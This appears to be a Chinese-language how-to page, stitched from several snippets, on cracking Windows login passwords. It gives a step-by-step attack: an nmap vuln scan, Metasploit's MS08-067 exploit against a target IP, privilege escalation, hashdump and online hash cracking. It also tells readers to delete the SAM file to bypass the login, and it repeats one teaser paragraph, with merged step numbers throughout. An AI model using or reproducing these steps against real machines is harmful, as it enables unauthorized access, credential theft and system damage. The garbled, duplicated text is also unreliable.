1.我們用於登入的windows密碼,在windows系統中會進行加密。一般密碼加密檔案儲存在c盤的windows\system32\config目錄下,檔名是sam檔案。在system目錄下有兩個非常重要的檔案
a.sam檔案:儲存著windows密碼,使用lm或者nt演算法加密成明文雜湊,再由syskey加密成亂碼的二次密文
b.system檔案:金鑰檔案,有乙個程式syskey,對上面的sam檔案進行第一次的解密,解密成明文的雜湊值
我們使用反編譯技術就可以獲得密碼
1.使用nmap掃瞄目標靶機(靶機ip)
nmap --script=vuln 192.168.1.183發現目標存在ms08-067漏洞
2.啟動滲透利用框架
metasploit3.搜尋該漏洞
search ms08-0674.使用攻擊模組
use exploit/windows/smb/ms08_067_netapi5.顯示要設定的引數
show options6.設定引數(kali ip)
set rhosts 192.168.1.1767.執行
run8.檢視許可權
getuid如管顯示是system就可以,否則輸入getsystem直到顯示system
hashdump複製密文
10.cmd5**解密
www.cmd5.com
破解windows 登入密碼!!!
1 進入到dos下面 怎麼進入dos稍候在說.然後進入到系統目錄下面比如2000系統,假設系統盤是c盤,命令如下 2c 3cd winnt system32 config 4del sam 5這樣就可以了.或者直接用命令del c winnt system32 config sam 後回車按y就可以...
關於破解windows開機密碼
秘訣1 大家知道,windowsxp的密碼存放在系統所在的winnt system32 config下sam檔案中,sam檔案即賬號密碼資料庫檔案。當我們登入系統的時 候,系統會自動地和config中的sam自動 校對,如發現此次密碼和使用者名稱全與sam檔案中的加密資料符合時,你就會順利登入 如果...
關於破解windows開機密碼
秘訣1 大家知道,windowsxp的密碼存放在系統所在的winnt system32 config下sam檔案中,sam檔案即賬號密碼資料庫檔案。當我們登入系統的時 候,系統會自動地和config中的sam自動 校對,如發現此次密碼和使用者名稱全與sam檔案中的加密資料符合時,你就會順利登入 如果...